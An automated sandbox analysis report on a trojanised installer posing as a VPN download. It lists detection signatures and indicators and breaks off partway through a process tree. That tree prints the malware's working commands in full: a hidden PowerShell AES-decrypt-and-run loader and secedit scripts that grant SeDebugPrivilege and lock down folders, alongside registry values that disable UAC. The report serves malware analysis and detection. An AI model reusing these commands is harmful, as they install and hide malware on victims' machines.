8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94

Analysis

max time kernel
150s
max time network
156s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 03:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe
Size

20.9MB
MD5

fde030055d5150a1641b35806d981818
SHA1

df0663eb909df92f62dc1cee17b50dbbfba158c5
SHA256

8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94
SHA512

55448fbd62c1fcee1930b3e3b22e6cfdc212ccae192d474de9280fd5a1dc8a8213c91489f9d32095719d30163ba8b70aaf052048da37799dc323fc2403bbe0e9
SSDEEP

393216:aechJVBlobQzoAb0m/oeLRIOoWdwUcdsKgbyyBkCfDrnyh:mRzoAb0NeNIl/kz/o

Score

10^/10

defense_evasion discovery evasion execution persistence trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

iusb3mon.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2904	powershell.exe
2908	powershell.exe
2680	powershell.exe
2784	powershell.exe
1536	powershell.exe
2028	powershell.exe
1964	powershell.exe
2620	powershell.exe
1776	powershell.exe
3016	powershell.exe

Executes dropped EXE 3 IoCs

Processes:

irsetup.exeiusb3mon.exe

pid	Process
1264	irsetup.exe
1188
536	iusb3mon.exe

Loads dropped DLL 3 IoCs

Processes:

8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exeirsetup.exe

pid	Process
2532	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe
1264	irsetup.exe
1264	irsetup.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

iusb3mon.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe"	iusb3mon.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

iusb3mon.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x0009000000004e74-74.dat	upx
behavioral1/memory/536-75-0x0000000000400000-0x000000000053F000-memory.dmp	upx
behavioral1/memory/536-227-0x0000000000400000-0x000000000053F000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

irsetup.exe

description	ioc	Process
File created	C:\Program Files\product1\letsvpn-latest.exe	irsetup.exe
File opened for modification	C:\Program Files\product1\letsvpn-latest.exe	irsetup.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 5 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2620	powershell.exe
1776	powershell.exe
2908	powershell.exe
2680	powershell.exe
1964	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exepowershell.execmd.exeSecEdit.exeSecEdit.exeSecEdit.exeiusb3mon.exepowershell.exeSecEdit.execmd.exeschtasks.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iusb3mon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecEdit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
2884	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

irsetup.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeiusb3mon.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
1264	irsetup.exe
2908	powershell.exe
2904	powershell.exe
1776	powershell.exe
2680	powershell.exe
1964	powershell.exe
2620	powershell.exe
2904	powershell.exe
2904	powershell.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
3016	powershell.exe
1536	powershell.exe
2784	powershell.exe
2028	powershell.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe
536	iusb3mon.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

irsetup.exeiusb3mon.exe

pid	Process
1264	irsetup.exe
1264	irsetup.exe
536	iusb3mon.exe
536	iusb3mon.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exeirsetup.exepowershell.exeiusb3mon.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process	procid_target
PID 2532 wrote to memory of 1264	2532	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe	30
PID 2532 wrote to memory of 1264	2532	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe	30
PID 2532 wrote to memory of 1264	2532	8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe	30
PID 1264 wrote to memory of 2904	1264	irsetup.exe	31
PID 1264 wrote to memory of 2904	1264	irsetup.exe	31
PID 1264 wrote to memory of 2904	1264	irsetup.exe	31
PID 1264 wrote to memory of 2908	1264	irsetup.exe	33
PID 1264 wrote to memory of 2908	1264	irsetup.exe	33
PID 1264 wrote to memory of 2908	1264	irsetup.exe	33
PID 1264 wrote to memory of 1776	1264	irsetup.exe	35
PID 1264 wrote to memory of 1776	1264	irsetup.exe	35
PID 1264 wrote to memory of 1776	1264	irsetup.exe	35
PID 1264 wrote to memory of 2620	1264	irsetup.exe	37
PID 1264 wrote to memory of 2620	1264	irsetup.exe	37
PID 1264 wrote to memory of 2620	1264	irsetup.exe	37
PID 1264 wrote to memory of 2680	1264	irsetup.exe	39
PID 1264 wrote to memory of 2680	1264	irsetup.exe	39
PID 1264 wrote to memory of 2680	1264	irsetup.exe	39
PID 1264 wrote to memory of 1964	1264	irsetup.exe	41
PID 1264 wrote to memory of 1964	1264	irsetup.exe	41
PID 1264 wrote to memory of 1964	1264	irsetup.exe	41
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 2904 wrote to memory of 536	2904	powershell.exe	43
PID 536 wrote to memory of 3016	536	iusb3mon.exe	44
PID 536 wrote to memory of 3016	536	iusb3mon.exe	44
PID 536 wrote to memory of 3016	536	iusb3mon.exe	44
PID 536 wrote to memory of 3016	536	iusb3mon.exe	44
PID 536 wrote to memory of 2784	536	iusb3mon.exe	45
PID 536 wrote to memory of 2784	536	iusb3mon.exe	45
PID 536 wrote to memory of 2784	536	iusb3mon.exe	45
PID 536 wrote to memory of 2784	536	iusb3mon.exe	45
PID 536 wrote to memory of 1536	536	iusb3mon.exe	46
PID 536 wrote to memory of 1536	536	iusb3mon.exe	46
PID 536 wrote to memory of 1536	536	iusb3mon.exe	46
PID 536 wrote to memory of 1536	536	iusb3mon.exe	46
PID 536 wrote to memory of 2028	536	iusb3mon.exe	47
PID 536 wrote to memory of 2028	536	iusb3mon.exe	47
PID 536 wrote to memory of 2028	536	iusb3mon.exe	47
PID 536 wrote to memory of 2028	536	iusb3mon.exe	47
PID 536 wrote to memory of 1636	536	iusb3mon.exe	50
PID 536 wrote to memory of 1636	536	iusb3mon.exe	50
PID 536 wrote to memory of 1636	536	iusb3mon.exe	50
PID 536 wrote to memory of 1636	536	iusb3mon.exe	50
PID 1536 wrote to memory of 3032	1536	powershell.exe	56
PID 1536 wrote to memory of 3032	1536	powershell.exe	56
PID 1536 wrote to memory of 3032	1536	powershell.exe	56
PID 1536 wrote to memory of 3032	1536	powershell.exe	56
PID 2028 wrote to memory of 2080	2028	powershell.exe	54
PID 2028 wrote to memory of 2080	2028	powershell.exe	54
PID 2028 wrote to memory of 2080	2028	powershell.exe	54
PID 2028 wrote to memory of 2080	2028	powershell.exe	54
PID 2784 wrote to memory of 1040	2784	powershell.exe	55
PID 2784 wrote to memory of 1040	2784	powershell.exe	55
PID 2784 wrote to memory of 1040	2784	powershell.exe	55
PID 2784 wrote to memory of 1040	2784	powershell.exe	55
PID 3016 wrote to memory of 1812	3016	powershell.exe	57
PID 3016 wrote to memory of 1812	3016	powershell.exe	57
PID 3016 wrote to memory of 1812	3016	powershell.exe	57
PID 3016 wrote to memory of 1812	3016	powershell.exe	57

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

iusb3mon.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	iusb3mon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	iusb3mon.exe

C:\Users\Admin\AppData\Local\Temp\8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe
"C:\Users\Admin\AppData\Local\Temp\8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
  "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5657458 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\8cb4e36a3c2813bd4f17c3e6ad0934f13a608d44d2c1fb74e5ec32e0536b0f94.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-1846800975-3917212583-2893086201-1000"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command function Copy-Stream { param( [IO.Stream]$FromStream, [IO.Stream]$ToStream ) $buff = New-Object 'byte[]' -ArgumentList 80kb while (($readCount = $FromStream.Read($buff, 0, $buff.Length)) -gt 0) { $ToStream.Write($buff, 0, $readCount) } } function Get-FixedBytes { param( [byte[]]$Bytes, [int]$Size ) if ($Bytes.Length -eq $Size) { return , $Bytes } if ($Bytes.Length -gt $Size) { return , $Bytes[0..($Size - 1)] } return , ($Bytes + (New-Object 'byte[]' ($Size - $Bytes.Length) )) } function Unprotect-AesData { [CmdletBinding()] param ( [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [string[]]$FromFile, [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Alias(\"PSPath\")] [string[]]$FromLiteralFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, Position = 1)] [string]$ToFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $false)] [switch]$Append, [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [System.IO.Stream[]]$FromStream, [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, Position = 1)] [System.IO.Stream]$ToStream, [ValidateSet(128, 192, 256)] [int]$KeySize = 256, [System.Security.Cryptography.CipherMode]$Mode = [System.Security.Cryptography.CipherMode]::CBC, [System.Security.Cryptography.PaddingMode]$Padding = [System.Security.Cryptography.PaddingMode]::PKCS7, [byte[]]$Key1, [byte[]]$IV1, [System.Security.SecureString]$Password, [byte[]]$PasswordBytes, [string]$PasswordPlain, [ValidateNotNullOrEmpty()] [ValidateCount(8, 2147483647)] [byte[]]$Salt = (200, 78, 178, 161, 117, 108, 182, 25, 83, 212, 170, 163, 245, 143, 72, 180, 117, 109, 100, 180, 172, 49, 207, 73, 78, 231, 183, 46, 143, 113, 43, 64), [int]$Iteration = 1000, [ValidateNotNullOrEmpty()] [string]$KeyHashAlg = 'SHA1' ) begin { $formatDebug = \"NamedBlock = {0,-10}, ParameterSetName = {1}\" $PSCmdlet.WriteDebug(($formatDebug -f \"begin\", $PSCmdlet.ParameterSetName)) # if (-not ($PSBoundParameters.ContainsKey('Password') -xor $PSBoundParameters.ContainsKey('PasswordBytes'))) { # throw \"Parameter 'Password' and 'PasswordBytes' must be bounded to only one, not both.\" # } try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding if ($null -ne $Key1) { $aes.Key = Get-FixedBytes -Bytes $Key1 -Size ($aes.KeySize / 8) if ($null -ne $IV1) { $aes.IV = Get-FixedBytes -Bytes $IV1 -Size ($aes.BlockSize / 8) } } else { try { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration, [System.Security.Cryptography.HashAlgorithmName]$KeyHashAlg) } catch { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration) #for ps2.0 } $aes.Key = $keyGen.GetBytes($aes.KeySize / 8) $aes.IV = $keyGen.GetBytes($aes.BlockSize / 8) } $Key1 = $aes.Key $IV1 = $aes.IV if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $filemode = if ($Append) { [System.IO.FileMode]::Append }else { [System.IO.FileMode]::Create } $ToStream = New-Object System.IO.FileStream -ArgumentList ($ToFile, $filemode, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None) -ErrorAction Stop } } catch { if ($ToFile -and $ToStream) { $ToStream.Close() } throw } finally { if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } process { $PSCmdlet.WriteDebug(($formatDebug -f \"process\", $PSCmdlet.ParameterSetName)) if (\"FromStreamToFile\", \"FromStreamToStream\" -contains $PSCmdlet.ParameterSetName) { foreach ($itemStream in $FromStream) { try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() try { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read, $true) } catch { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) } # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } return } foreach ($apath in $(if (\"FromFileToFile\", \"FromFileToStream\" -contains $PSCmdlet.ParameterSetName) { Convert-Path -Path $FromFile } else { Convert-Path -LiteralPath $FromLiteralFile })) { try { $itemStream = New-Object System.IO.FileStream -ArgumentList ($apath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read) [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($itemStream) { $itemStream.Close() Clear-Variable -Name itemStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } } end { $PSCmdlet.WriteDebug(($formatDebug -f \"end\", $PSCmdlet.ParameterSetName)) if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $ToStream.Close() } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } # main $FromLiteralFile = \"C:\ProgramData\Program\Uninstall_.exe\" $ToFile = \"C:\ProgramData\Program\iusb3mon.exe\" $PasswordPlain = \"123\" if ($FromLiteralFile -ne $ToFile) { Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $ToFile -PasswordPlain $PasswordPlain } else { #inplace $fi0 = Get-Item -LiteralPath $FromLiteralFile -ErrorAction SilentlyContinue if ($null -ne $fi0) { $tmpfile = [IO.Path]::GetTempFileName() Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $tmpfile -PasswordPlain $PasswordPlain if ($?) { Move-Item -LiteralPath $tmpfile -Destination $ToFile -Force } } } #ps1Ö´ÐÐexe Start-Process -FilePath $ToFile -ArgumentList '$false' -WorkingDirectory ([IO.Path]::GetDirectoryName($ToFile)) -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\ProgramData\Program\iusb3mon.exe
      "C:\ProgramData\Program\iusb3mon.exe" $false
      4⤵
      UAC bypass
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:536
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3016
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2784
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1040
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1536
      - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
